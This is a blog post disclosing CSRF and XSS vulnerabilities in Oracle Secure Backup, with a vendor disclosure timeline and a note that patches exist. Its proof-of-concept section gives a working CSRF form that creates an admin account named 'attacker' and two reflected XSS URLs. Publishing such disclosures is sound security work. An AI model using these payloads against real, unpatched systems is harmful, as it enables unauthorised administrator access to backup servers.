Saturday, April 28, 2012

Oracle Secure Backup Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of files on a file system. The software can also serve as a media management layer for Recovery Manager through the SBT interface.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Oracle Secure Backup. These issues were discovered in a default installation of Oracle Secure Backup Other earlier versions may also be affected.

Proof of concept
Cross-Site Request Forgery (CSRF)

<form action="https://[target]/index.php" id="csrf" method="post">
<input type="hidden" name="process" value="1" />
<input type="hidden" name="tab" value="2" />
<input type="hidden" name="mode" value="2" />
<input type="hidden" name="button" value="Ok" />
<input type="hidden" name="screen" value="d" />
<input type="hidden" name="selector%5B%5D" value="" />
<input type="hidden" name="changeobject" value="attacker" />
<input type="hidden" name="upassword" value="passwd123" />
<input type="hidden" name="vpassword" value="passwd123" />
<input type="hidden" name="oclass" value="admin" />
<input type="hidden" name="uclass" value="" />
<input type="hidden" name="givenname" value="" />
<input type="hidden" name="unixname" value="" />
<input type="hidden" name="unixgroup" value="" />
<input type="hidden" name="ndmpserveruser" value="no" />
<input type="hidden" name="emailaddress" value="" />
<input type="hidden" name="op" value="Add" />

Cross-Site Scripting (XSS)

  • https://[target]/login.php?clear=yes&tab='%20stYle='x:expre/**/ssion(alert(1))%20&mode=3
  • https://[target]/login.php?clear=yes&tab=3&mode='%20stYle='x:expre/**/ssion(alert(1))

Oracle has released patches which address these issues. Please see the references for more information.


Vendor URL:

Disclosure Timeline
2011-01-21 - Vulnerabilities discovered.
2011-01-21 - Vulnerabilities reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-07-19 - 
Patch released.
2011-07-20 - 
Advisory published by Secunia.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.